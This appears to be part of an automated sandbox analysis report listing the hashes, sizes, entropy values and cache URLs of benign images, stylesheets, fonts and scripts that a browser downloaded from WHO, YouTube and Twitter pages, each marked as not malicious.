                                                                                                                                                                    SHA-512:7A3CAC8FD6C5DAEE4F432DC9812ABD1E9EA6FEF7AF7B88CCABE99FAD2C6600377077CBF8E24C260D96896D49789982B5DF4090489327C6F644E3869F6896E402
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/departments/child-health/992x312-pag-coronavirus-2.tmb-768v.jpg?Culture=en&sfvrsn=4da24492_7
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\A-year-in-pictures--A-shared-commitment-to-change-the-course-of-the-pandemic_WHO-Bangladesh--TA-3[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x511, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):79855
                                                                                                                                                                    Entropy (8bit):7.987829633502392
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:qoimXNE8xjKN0wKof8gWYcvukJGaq/jXKzxMLx7UTjsEv56K2:zigNE8RKN0S4H6XKzIxke
                                                                                                                                                                    MD5:1094891E29ADE0E7819FB24E0B38C9DE
                                                                                                                                                                    SHA1:98120BE9DCA45D2984C7292E4668491B571315A5
                                                                                                                                                                    SHA-256:83868BCFF2C7B7E8BD92B00903E036E531C5BD0D9E4C9540FD540292E1559074
                                                                                                                                                                    SHA-512:D183E89805ADE487486E793C5B659B64B73C5D5E751794501FA96FBCDD0FA8BB5B42138E29F5723DAF797212940BBC2143E4AEBF34B11BD2DC05EF6581B525A1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/bangladesh/cxb/a-year-in-pictures--a-shared-commitment-to-change-the-course-of-the-pandemic_who-bangladesh--ta-3.tmb-768v.jpg?sfvrsn=dbf025dd_1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\DSC_8725_s[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x359, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):37650
                                                                                                                                                                    Entropy (8bit):7.977424741385987
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:wqR/SR0WUnqF8vKftilrF02K3DdQXR8nF8PXD5rDwez6wSz:PStZF8ktil502KTdQXSnF4NA
                                                                                                                                                                    MD5:97018CA0651276A5DEB7EE3D9EDACE08
                                                                                                                                                                    SHA1:D557607F00257D9773BC44FC1900AC1123FE12CF
                                                                                                                                                                    SHA-256:27215C4AB8A98F8387188BAD3D596CB6F9ED8762FF043255E0C4A3003946CECC
                                                                                                                                                                    SHA-512:5DF0A1BB490D3D77FDF029B1D51ED972745CAB28D85202AE611ED273243B597B80881DB4389079C4C400C7519573CF426847FBEE4D191CEB7EC6C745EAC4CEA8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/dsc_8725_s.tmb-549v.jpg?Culture=en&sfvrsn=f688b931_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\RS34669_Covax_Sticker_CMYK_Covax_5_Sqaure_CovaxColours[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x367, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):29217
                                                                                                                                                                    Entropy (8bit):7.95659159276415
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:1RRKw/eEYOGWJoDy//ZKrHvWZvFOz5hWniY:X5eEY3+Hg7OZv2LWJ
                                                                                                                                                                    MD5:46AFC101D01A5C37D2DAB4BDE1247598
                                                                                                                                                                    SHA1:9548F4C943D39503BBBAC107C36F47B2561108A1
                                                                                                                                                                    SHA-256:358BB9FE70555AE5F2135B522765948B3BA4F10A5805795DB725236BC0CA9E44
                                                                                                                                                                    SHA-512:F75693E5BFE2BECA06CA2B70DCD401B7DC5BFBBF1213BCE38BA27582FF44D11E89E514F40242934CD83FADF3C487C74711E612240854395FBBFF3F3320EAF801
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/sri-lanka/rs34669_covax_sticker_cmyk_covax_5_sqaure_covaxcolours.tmb-549v.jpg?Culture=en&sfvrsn=5b1bfc6f_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\accordion-footer-list.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2376
                                                                                                                                                                    Entropy (8bit):4.846958680640504
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:pggG75XMzPp8SWZS45dC7HT5nfSY4yZv4BWivVkXwbCclKGkLTrOlrOgp7xH8iFh:W8tgPY0yDukzMr/p7xHug
                                                                                                                                                                    MD5:39343D507CC893071356B23C99F57C11
                                                                                                                                                                    SHA1:B78A5DEDBF2DC50A94CE7FD5379D8477E4E87123
                                                                                                                                                                    SHA-256:951F1377A961CEBDFFE3B0CB329193499906F878D7DEF233D5F09E403699DD07
                                                                                                                                                                    SHA-512:A91FC1D4CAEB27861EEF1AA2BE7D62F6768FE00951A1387F1057BB3C3B5DCCBA6C90B73B4D8F5FAE0F23CDFD14FB32C5F6CF32DF1F62A88643C7A02076928C71
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/accordion-footer-list.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";!function(window){var accordion=null,activePanelClass="is-active",accordionPanels=null,currentPanel=null;function _activateSelectedPanel(evt){evt.preventDefault();var selectedPanel=function(el,cls){for(;(el=el.parentElement)&&!el.classList.contains(cls););return el}(evt.currentTarget,"sf-accordion-footer__panel");if(currentPanel===selectedPanel&&currentPanel.classList.contains(activePanelClass))return currentPanel=selectedPanel,void _removeCurrentPanel();_removeCurrentPanel(),function(selectedPanel){selectedPanel.classList.add(activePanelClass);var currentContent=selectedPanel.querySelector(".sub-level");currentContent.style.display="block",currentContent.style.height=currentContent.offsetHeight,currentContent.style.opacity=1,currentPanel=selectedPanel}(selectedPanel)}function _removeCurrentPanel(){if(void 0===currentPanel)return this;var currentContent=currentPanel.querySelector(".sub-level");currentContent.style.opacity=0,currentContent.style.display="none",currentPanel.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\all[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):36599
                                                                                                                                                                    Entropy (8bit):4.744239554341881
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:W++rB31vxojTQ6m4TotMam317fKZII9kQCY/BGMI993BXMl3oPGEo/fA:a31vxoXQ6vWU9KJkdY/kME93KaFo/Y
                                                                                                                                                                    MD5:D1ACB8AD33B1526ACBFD3F0028B859B0
                                                                                                                                                                    SHA1:292F3E748A5536C0E9FDC3BEE02DBF89ADC80B1D
                                                                                                                                                                    SHA-256:CFAC6241DD3AABB5F1552C17501790093015C006A8E13671823C1FF4872BEAAE
                                                                                                                                                                    SHA-512:70A9A515B42605647162B451F59DF492CF147568484B987A40605A214138BC30CE01B143CF660433D7933F2B1E474652137717FDB05E1D8747DA1C31FF5EDC68
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://use.fontawesome.com/releases/v5.0.10/css/all.css
                                                                                                                                                                    Preview: /*!. * Font Awesome Free 5.0.10 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{fl
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\event[1].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 131 x 131, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):5092
                                                                                                                                                                    Entropy (8bit):7.926179113262451
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:g7MAVls61jDxabyZHmgWvavgQ9bhr591E05GNYUuMAu4McVy1FI0cPbyEsY6gtIt:g9FjDtmH4gQ9bhrb1E/NYVMh4jVM60ce
                                                                                                                                                                    MD5:A262B3983C1769FF3D0A68A0101A8EA8
                                                                                                                                                                    SHA1:C3F8AF91B3C2A5DDF4C5C1FA47742DECD4E974D5
                                                                                                                                                                    SHA-256:F95B8033DDF4911D628A7A2D856B00FFF73D589D9885EE8CAB1A48C2D3B180EC
                                                                                                                                                                    SHA-512:C2AAEB823B3C4E1575D867B4C1CBCA051A916A32F2BAFD055B1A929F3E0C3AA39A9B71E2395778C3C95E3C7C343F729DCF5D95E7A02CA65846C7D9B0A059DCB3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/icons/media-centre/event.tmb-131v.png?Culture=en&sfvrsn=c073cbae_12
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fa-solid-900[1].eot
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Embedded OpenType (EOT), Font Awesome 5 Free family
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):115148
                                                                                                                                                                    Entropy (8bit):6.287293018741218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:bbIqflGXeaiyefcq1VaOcPRdCJjX4XoxFIRuA7ZqhF1PwmLhrcR/2cv7s83RWt8A:bbI2Gfiyefcq1VaOcPRdC54XoxFIRuAw
                                                                                                                                                                    MD5:303DC0631C4578227EA986E8832D3AD3
                                                                                                                                                                    SHA1:1B8B0D1740CA205E74FCC10930179AAA7180FCCF
                                                                                                                                                                    SHA-256:500EF6619A645A0B54A6EAA11F77A71F67DA7A7E0C9B73F0E43E7337670D04B8
                                                                                                                                                                    SHA-512:A47615BD98835B639E310C830D4BE0714C062AB875FB35E47B6A487006C2D18D1AFE69EE3A1F770BF5034A70632AEA0676B324DBF969DF2C080A6CB4955E8C52
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://use.fontawesome.com/releases/v5.0.10/webfonts/fa-solid-900.eot?
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fetch-polyfill[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Pascal source, ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):8543
                                                                                                                                                                    Entropy (8bit):5.238064281324506
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:oQHdiEslZc0rsNYNU5mSJHqI03aej6tZoaMLQO/x5/P80+HcW:ocHslLsP5muHqI0Jj6tZcUO/x5+V
                                                                                                                                                                    MD5:04E3CC8A9641B3F9F9C9370F4E9B5BDD
                                                                                                                                                                    SHA1:9602A891F583094BB04FD407B253ABCAFFB8C8D0
                                                                                                                                                                    SHA-256:DE6C4FFA2BD9FD283610E28D0DB2EC48607AAB39D213A51AEF248673A0A7E980
                                                                                                                                                                    SHA-512:58942BCC0F39D620A475B65C1AEB4F18872F68F22C89DEC076906A0DB8BC2B7CCA9357710A7824A0FA7404FF73F41013AECA34609CAACD2187414F7BD0D490D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/fetch-polyfill.vflset/fetch-polyfill.js
                                                                                                                                                                    Preview: /*.. Copyright (c) 2014-2016 GitHub, Inc... Permission is hereby granted, free of charge, to any person obtaining. a copy of this software and associated documentation files (the. "Software"), to deal in the Software without restriction, including. without limitation the rights to use, copy, modify, merge, publish,. distribute, sublicense, and/or sell copies of the Software, and to. permit persons to whom the Software is furnished to do so, subject to. the following conditions:.. The above copyright notice and this permission notice shall be. included in all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,. EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF. MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND. NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE. LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION. OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\gtm[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):113078
                                                                                                                                                                    Entropy (8bit):5.529080047662171
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:KNu9KdnqpMXbOlh0E+HG++/HRE6cszuzKZQa8PrpO+01W9nKP9CouwqDBmusHyVx:KNu9yqpMruh07+5ssGa8Po++C3+y1Ie7
                                                                                                                                                                    MD5:B0A1F51883DFECEF5093A536714A7B44
                                                                                                                                                                    SHA1:EEFAE2A7AF69B58797F48D01A377270F842C131D
                                                                                                                                                                    SHA-256:A0CDF300DA78BD35E03EBF7466E92C4F0F5A6D4655E17C0782E14B4469B7FA72
                                                                                                                                                                    SHA-512:B3F3CD3E9DC88FD6CBC9481863C3E476B22E279C5F9553F8DA8E9E04319B6A575F58332D5BFC04FFE6AD7AF4F148CFCE22FBC3225DD45F668BD23D74CF22C1F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.googletagmanager.com/gtm.js?id=GTM-5QFSQRT
                                                                                                                                                                    Preview: .// Copyright 2012 Google Inc. All rights reserved..(function(w,g){w[g]=w[g]||{};w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');(function(){..var data = {."resource": {. "version":"69",. . "macros":[{. "function":"__e". },{. "function":"__c",. "vtp_value":"GTM-P9P822R". },{. "function":"__jsm",. "vtp_javascript":["template","(function(){return document\u0026\u0026document.documentElement\u0026\u0026document.documentElement.lang?document.documentElement.lang:\"undefined\"})();"]. },{. "function":"__gas",. "vtp_cookieDomain":"auto",. "vtp_doubleClick":false,. "vtp_setTrackerName":false,. "vtp_useDebugVersion":false,. "vtp_useHashAutoLink":false,. "vtp_decorateFormsAutoLink":false,. "vtp_enableLinkId":false,. "vtp_dimension":["list",["map","index","2","dimension",["macro",2]]],. "vtp_enableEcommerce":false,. "vtp_trackingId":"UA-30222631-2",. "vtp_enableRecaptchaOption":fa
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\maxresdefault[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x720, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):87871
                                                                                                                                                                    Entropy (8bit):7.967204511872682
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:AR2rBLaCDNkn2Pr5ht3FUDE1wOTBcnUo4bbhkxURFMEks1sNRapgVeTU:jBGN2HlFaE15Vc/4bbhlR2xNspQx
                                                                                                                                                                    MD5:52698A0D30C8361844DE86EB60EE1774
                                                                                                                                                                    SHA1:DAEB778F052B63956D01B24766821ADC18EE4EAD
                                                                                                                                                                    SHA-256:A0E2D4A84566555A9DE5646FBCD7961D0A550336FEFCA78F065E8D975B85A72A
                                                                                                                                                                    SHA-512:5A34154682E9A6035D3AAF07F1E1F1C77D0E0BE8B078E5724B7E93C18507FAA58CFF295850E56CDA00BCE2F145DF0961682D8C574B6BD0D5CE7E1CBE85A505FE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://i.ytimg.com/vi/yEIPefMsf70/maxresdefault.jpg
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\print.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2051
                                                                                                                                                                    Entropy (8bit):4.951787000714645
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:wmhsFdMMy/bAGtv1TdbSRm75RSSGkMWt2ZmTLXAf5q5GO:AWmT0DGoZ
                                                                                                                                                                    MD5:CF9593C4BE04185D1DFEB8344FD65A5C
                                                                                                                                                                    SHA1:D0D215D0F95AD5505CE33562F89D683963DA3742
                                                                                                                                                                    SHA-256:09652EBACDB38A225D91FBA3C56C920454B153DAB2B0AF42B6C67363960EA655
                                                                                                                                                                    SHA-512:A8BC8DED55D7A32029D1EEC9D5AD4F6DF3C1AA8FCA8F44ABF519D812101A76D648573FF362AAF194A3397BA823DE0A7BA79AF25BF5FDB94C61EA44989BE99B52
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/print.min.css?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\publications-hero-image-thumb[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x315, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):22804
                                                                                                                                                                    Entropy (8bit):7.949652507694008
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:YvxIoRoshSIt4S+SMRS/Y4qjMFxKOXHNd7jd8zjnu7boKf3Ovd:zoRbSItD+Q/nq3ujm3nufPmvd
                                                                                                                                                                    MD5:5AA9FA7785CDDABEC52DFD1D428C553E
                                                                                                                                                                    SHA1:A2FC524C35815EEE0CFAA3324FEA4ED4D754A41A
                                                                                                                                                                    SHA-256:F84DC74BA342D1CD17A928F33B127D33D563ED584CBDBA7765A8AE71BB3DB76B
                                                                                                                                                                    SHA-512:84007F6C1B9375CC9AEB7162BB8717A77B3E5613E5759FC05CF107EEEC3CC52C04EE12DF1420005113308FA58A4A4B5521236C41AF843F05CF39AB4390E613C8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/publications/publications-hero-image-thumb.tmb-549v.jpg?sfvrsn=8174ac48_1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\remote[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):99077
                                                                                                                                                                    Entropy (8bit):5.447801988861071
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:Axf+m+dKlEf6646K2u0VX5FVOtNJzyLh1Ukwd0PwFJx:0Gm+dKC6P6Kd0VX5FVOtNJzyLh1UkwdR
                                                                                                                                                                    MD5:370C2D515006EEE1E72A820CA6F56E61
                                                                                                                                                                    SHA1:8E67BBAA4CA7FA9CE9F7217F931F8ECC116CFC1F
                                                                                                                                                                    SHA-256:9A3AC37A731E20B60F6A8A83C325B99B51A9E6647C747C196E0626F0FA5AB631
                                                                                                                                                                    SHA-512:3638091B852079A556C10B6D90B0CCF14D748DD09FD255A8FB878DA27D5A8240AD0001CBE81DEA535A3659D65FF8C5D3F33549FA7330E49CE28C78C26AD1CD4C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/player_ias.vflset/en_US/remote.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\thumbs_covid-map.tmb-479v[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x269, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):23346
                                                                                                                                                                    Entropy (8bit):7.955372285250941
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:KoCathmwmvn348bnhSunvreQ5UMvGRpvCDN5lsUEd9YVLf+cabQGjx9El0Jpd4WA:PmwWnIWlQpvI5sUEdPcpGjxeUyW1Ox
                                                                                                                                                                    MD5:948620EE0F78512CE7C51E540E7C6397
                                                                                                                                                                    SHA1:264DC33227F2D56D40C7671A22F20D202A3B1395
                                                                                                                                                                    SHA-256:B3E4348B7B78FFA71C370F66E53B2B3E5BEFAA8F6CD7E2FFF967CF46DE09A7F6
                                                                                                                                                                    SHA-512:204B1EFAF2F9A9D12DFE3B9241170334F28B4FFC8DF8F5204F51EFD063B9ADBB204E644BA31540258939FA92D3E3EB519C0F9A263F5B79896898A107E16314CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\thumbs_interactive-timeline.tmb-479v[1].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 479 x 269, 8-bit/color RGB, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):25897
                                                                                                                                                                    Entropy (8bit):7.9285805511652745
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:ukfqZ7tzf6MGfhrO0ABtPUZIVC4wZjn1iiCq:uKqZQl5O5/UKdwNnQM
                                                                                                                                                                    MD5:AA21BCAF6ED6F80B83E46DC68CE1D63F
                                                                                                                                                                    SHA1:53681EE86AC41E7740286CC0C389EA7D1481E97B
                                                                                                                                                                    SHA-256:818614F988027EE371283F8879EB5B5323DA105CFA5DE45AC1CE45103FD52F2E
                                                                                                                                                                    SHA-512:BD3AA4C521A01A8AF33F650B6DB33993657E40E66351D0F6509FA13D252C4C61130D5782AF3369161A6ACA16AF67ED9C9579AA80E56A4CF55547A2681E3FAD4D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.png
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\unnamed[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:[TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 68x68, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):4345
                                                                                                                                                                    Entropy (8bit):7.874582079474217
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:m/KOrKlpGRcTXmkJjTCvXeyGg/05HyMIg1t9PdW15ZO:krEpGiXmh7GL5HJIg1ta8
                                                                                                                                                                    MD5:A61EFD487B024B49CA85B9D40879C791
                                                                                                                                                                    SHA1:C08CA9F9B4522B46A04F9EFD479851801122D8B4
                                                                                                                                                                    SHA-256:7796E8CC5B092DA7FB429290CFAEB9C30CA82C2230F34E125A6E6D9FCDEAA588
                                                                                                                                                                    SHA-512:C2B5B0035D2E48402BF351AA4C537A2EEEA2B8DF4C8919B700A332CEF776FCD9572AF115DA8E61436F4FDB36390ACAD491FE4CF8D597E743FB363B28CD1C5697
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://yt3.ggpht.com/ytc/AAUvwnh1J3YmbofB6Ft63iBCJsPMhbnsTbCEVyG0BXKw0g=s68-c-k-c0x00ffffff-no-rj
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\widgets[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):97892
                                                                                                                                                                    Entropy (8bit):5.182853024618601
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:NC4PzC7TEHd2NqDrbGvbCDkcOpO+Jjoo7sgeu8ryM2gSeS/:tziE9ucKJvjwNFS/
                                                                                                                                                                    MD5:965FCFC23C3459AFE3EBF42B92F31E6D
                                                                                                                                                                    SHA1:58534C361D8075239384536D7E67B2A667885636
                                                                                                                                                                    SHA-256:0CCADAC47F8DB7D9086CB5D1A3230580EE43E7DB056734068CE3785376E90500
                                                                                                                                                                    SHA-512:7A29E9C28245E99422C470017D23685D7B9FCAB2969E74A12A5820BA38C89753EE289F601942C55BF29AC3595485E0BBF61F369F8598A370766B9FEFCE75696E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://platform.twitter.com/widgets.js
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\www-player[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):360299
                                                                                                                                                                    Entropy (8bit):5.2446415637388615
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:yDQI0irpHrpj/fn8MZv8M5q4ayF5G0OXoyUDrzltPljuoOP5FRrDJciM/ByDjI/j:n2bDrzxCHgfyCpLd
                                                                                                                                                                    MD5:00DB9220087CBDB657318871DAE5F9AC
                                                                                                                                                                    SHA1:451BACA7F327209922A56B471616E1194BA4891A
                                                                                                                                                                    SHA-256:D41D7D1BE7BF8A6F809A89A8814C67FEC126AD93CFEDC50F62166BDDF7FA8C63
                                                                                                                                                                    SHA-512:BED7A98A87B69AAA249FFC84634F9307772412E010F4C17288B4937B103B02B8862CFEF0121B8007E80B6107CDE6AEF5605922138D6A45BA93213154262B3A65
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/www-player.css
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\140.61020b6c086bdb8bc696[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                    Entropy (8bit):4.148631044851981
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:VH+C4kFTp5GWqUSfq68TbQzBPhUS6ZT08w+Fn+:B44TpX6zTUSqQ6F+
                                                                                                                                                                    MD5:D49B55C641BBC6CB45EAC992C13F3618
                                                                                                                                                                    SHA1:9EF6A645EE35048BF0359CB6B70CFA29D6B4D687
                                                                                                                                                                    SHA-256:25A50F8E41994E7ADDC8B761FD99F5F8560128909835A388EDF76026C7A4C4F6
                                                                                                                                                                    SHA-512:A5ECE009DE90D190F10FE1467F1F9073C8BF20F4D75F0F37B152BF625136D5A5A6D9EA5B766F4A8FB5FCEAA8277A2B33D44D4B44749ACD4B9C5E946136A1E69D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/140.61020b6c086bdb8bc696.js
